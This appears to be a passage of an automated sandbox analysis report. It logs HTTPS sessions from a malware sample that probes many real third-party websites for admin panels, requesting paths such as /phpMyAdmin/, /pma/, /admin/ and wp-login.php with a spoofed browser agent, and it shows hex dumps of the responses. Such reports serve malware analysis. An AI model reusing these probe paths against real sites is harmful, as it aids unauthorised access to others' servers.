                                                                                                                                                                                                    2023-11-26 05:59:44 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    395192.168.2.44928515.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    396192.168.2.449504104.200.30.31443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC171OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    397192.168.2.465497120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC253OUTGET /saml/index.php?page=%2Fphpmyadmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1077INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    398192.168.2.449454213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    399192.168.2.44950895.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC301OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=9et5pla7nsi6m08nuam1qvco53
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC426INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:43 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    400192.168.2.44969418.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC158OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    401192.168.2.44986823.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC164OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC618INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 70 6d 61 2f 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61 2d 37 63 39 63 34 34 36 63 38
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/pma/Server: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a-7c9c446c8


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    402192.168.2.44968134.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC171OUTGET /en/admin HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
